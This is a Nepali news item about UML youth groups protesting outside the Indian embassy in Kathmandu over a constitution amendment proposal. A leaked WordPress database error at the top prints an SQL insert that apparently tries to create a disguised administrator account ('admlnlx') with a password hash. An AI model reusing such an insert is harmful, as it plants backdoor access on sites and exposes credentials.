WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BY2wcdG3V8gJ1kjvhTG3bLMabZmMy10', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 06:12:10', '', 'admlnlx', 'admlnlx')
काठमाडौं, मंसिर १८–
नेकपा एमालेको भाृत संगठन युवा संघ नेपाल र अनेरास्वबियुले आज (शनिबार) बिहान काठमाडौंस्थित भारतीय दूतावास अगाडि घेराउ गरेका छन्। संविधान संशोधन प्रस्ताव भारतको योजनामा आएको भन्दै दबाब स्वरुप बिहान १० बजेदेखि १२ बजेसम्म दूतावास घेरा उ गरिएको अनेरास्वबियुका उपाध्यक्ष महेश बर्तौलाले जानकारी दिए ।
भारतीय चलखेल बन्द गर, राजदूत रन्जित रेलाई देश निकालजस्ता नारा लगाएर उनीहरुले प्रर्दशन गरिरहेका छन्। संविधान संशोधनमा मधेसी दलहरुलाई दबाब दिन भन्दै आज भोजको आयोजना गरेपछि आफूहरुले घेराउ गरेको बर्तौलाले जानकारी दिए ।